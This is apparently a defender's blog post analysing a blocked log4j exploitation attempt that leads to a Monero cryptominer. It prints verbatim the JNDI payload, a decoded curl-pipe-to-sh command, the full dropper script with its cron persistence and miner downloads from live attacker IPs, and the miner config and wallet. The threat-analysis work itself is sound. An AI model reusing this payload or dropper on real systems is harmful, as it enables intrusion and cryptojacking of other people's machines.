Uncovered my 1st cryptominer!
A few days back I received a firewall alert regarding a log4j exploitation attempt, targeting a web server.
Since every security vendor under the sun has released an update, the request was blocked and the attack was unsuccessful.
The reported -source- IP was not flagged as malicious or reported in any of the known databases, which triggered my curiosity.
I decided to try and understand the underlying infrastructure and the attacker’s end goal.
First things first, let’s have a look at the payload used to abuse the vulnerability, which was a pretty common exploitation attempt
${jndi:ldap://181.114.232.78:8066/TomcatBypass/Command/Base64/Y3VybCAtZnNTTCBodHRwOi8vMTQuNTUuNjUuMjE3OjgwODAvYS9sci5zaCB8c2g=}
As the directory kindly indicates the request string is encoded using base64. Decoding it, returned the following.
curl -fsSL http://14.55.65.217:8080/a/lr.sh |sh
Let’s run a quick scan against the newly found IP [2] and try to determine it’s role.
![](https://slashparity.com/wp-content/uploads/2022/03/image-12.png)
From the nmap results and some OSINT, this looks like an exploited host used for call-backs. Next step, let’s grab the lr.sh script found in the curl command above.
![](https://slashparity.com/wp-content/uploads/2022/03/image-1024x289.png)
lr.sh
!/bin/sh
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
pkill -9 -f mysqldd
pkill -9 -f monero
pkill -9 -f kinsing
pkill -9 -f sshpass
pkill -9 -f sshexec
pkill -9 -f cnrig
pkill -9 -f attack
pkill -9 -f dovecat
pkill -9 -f donate
pkill -9 -f 'scan.log'
pkill -9 -f xmr-stak
pkill -9 -f crond64
pkill -9 -f stratum
pkill -9 -f /tmp/java
pkill -9 -f /tmp/system
pkill -9 -f excludefile
pkill -9 -f agettyd
pkill -9 -f /dev/shm
pkill -9 -f /var/tmp
pkill -9 -f './python'
pkill -9 -f './crun'
pkill -9 -f './.'
pkill -9 -f 'xmrig'
pkill -9 '.6379'
pkill -9 'load.sh'
pkill -9 'init.sh'
pkill -9 '.rsyslogds'
pkill -9 pnscan
pkill -9 masscan
pkill -9 ladaras
pkill -9 kthgado
pkill -9 kdevtmpfsi
pkill -9 solrd
pkill -9 meminitsrv
pkill -9 networkservice
pkill -9 sysupdate
pkill -9 phpguard
pkill -9 phpupdate
pkill -9 networkmanager
pkill -9 knthread
pkill -9 mysqlserver
pkill -9 watchbog
pkill -9 xmrig
pkill -9 bashirc
pkill -9 zgrab
killall -9 /tmp/*
killall -9 /var/tmp/*
crontab -l | grep -e "8DdBvkRn" | grep -v grep
if [ $? -eq 0 ]; then
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "*/5 * * * * curl -fsSL https://pastebin.com/raw/8DdBvkRn | sh"
) | crontab -
fi
for i in $(ls /proc|grep '[0-9]'); do
if ls -al /proc/$i 2>/dev/null|grep kthmimu 2>/dev/null; then
continue
fi
if grep -a 'donate' /proc/$i/exe 1>/dev/null 2>&1; then
kill -9 $i
fi
if ls -al /proc/$i | grep exe | grep "/var/tmp|/tmp"; then
kill -9 $i
fi
done
PROC_NAME=kthmimu
ProcNumber=ps -ef |grep -w $PROC_NAME|grep -v grep|wc -l
if [ $ProcNumber -le 0 ];then
ps auxf|grep -v grep | awk '{if($3>=70.0) print $2}'| xargs kill -9
pkill -9 -f '/tmp/.'
mkdir /tmp/.mimu
curl -fsSL http://14.55.65.217:8080/a/config.json -o /tmp/.mimu/config.json
curl -fsSL http://14.55.65.217:8080/a/x.rar -o /tmp/.mimu/kthmimu
curl -fsSL http://14.55.65.217:8080/a/apache.sh -o /tmp/.mimu/apache.sh
chmod +x /tmp/.mimu/kthmimu
chmod +x /tmp/.mimu/apache.sh
nohup /tmp/.mimu/apache.sh 1>/dev/null 2>&1 &
sleep 2
rm -f /tmp/.mimu/apache.sh
fi
It looks like the script is making sure no other known malware or cryptominner is currently running on the affected host and then reaches out to pastebin and the compromised server.
![](https://slashparity.com/wp-content/uploads/2022/03/image-2-1024x503.png)
config.json
"cn/0": false, "cn-lite/0": false }, "cuda": { "enabled": false, "loader": null, "nvml": true, "cn/0": false, "cn-lite/0": false }, "donate-level": 1, "donate-over-proxy": 1, "log-file": null, "pools": [ { "algo": null, "coin": null, "url": "91.121.140.167:80", "user": "45tdM15BthJWCKScmdxF9nGKfnZJpV8jK3ZmBDUofM5fdzoXURTrb9QQeCwiNXHyvibVFqtxeWwx57FnCqL4Z3y4S4G2tTy", "pass": "x", "rig-id": null, "nicehash": false, "keepalive": false, "enabled": true, "tls": false, "tls-fingerprint": null, "daemon": false, "socks5": null, "self-select": null } ], "print-time": 60, "health-print-time": 60, "retries": 5, "retry-pause": 5, "syslog": false, "tls": { "enabled": false, "protocols": null, "cert": null, "cert_key": null, "ciphers": null, "ciphersuites": null, "dhparam": null }, "user-agent": null, "verbose": 0, "watch": true, "pause-on-battery": false
}
After reading the configuration file (config.json), I can safely conclude that the attacker was trying to install and configure a cryptominner, specifically one that is mining monero (cn algorithm) on pool “91.121.140.167” and sending all earning to the wallet seen bellow :
![](https://slashparity.com/wp-content/uploads/2022/03/image-5-1024x269.png)
Wallet address : 45tdM15BthJWCKScmdxF9nGKfnZJpV8jK3ZmBDUofM5fdzoXURTrb9QQeCwiNXHyvibVFqtxeWwx57FnCqL4Z3y4S4G2tTy
![](https://slashparity.com/wp-content/uploads/2022/03/image-6.png)
Since we have the crypto wallet’s address let’s have a look on some major XMR mining pools to find out how the attacker’s cryptominer is doing.
I only found the wallet in one XMR pool (supportxmr). It looks like he has earned more than 1.2 XMR, the reported hashrate at (320 kH/s) indicates an extended network of affected machines since the average hashrate for an AMD Ryzen 5 3600 (working exclusively for mining) is around 6,5kH/s. The last reported hash was a few seconds ago, indicating ongoing exploitation.
![](https://slashparity.com/wp-content/uploads/2022/03/image-8-1024x511.png)
I haven’t yet managed to fully understand the x.rar file (elf, probably the actual miner) found on the exploited server[2] so there are missing links, I will try to update this post once/if I make any progress.
![](https://slashparity.com/wp-content/uploads/2022/03/image-10-1024x118.png)
Infrastructure Summary
[1] Initial exploitation attempt : 181.114.232.78
*Update 18/3/2022, additional IP captured : 148.72.213.165
[2] Exploited host serving malware : 14.55.65.217
[3] XMR Mining Pool : 91.121.140.167
Any feedback is truly appreciated, thank you.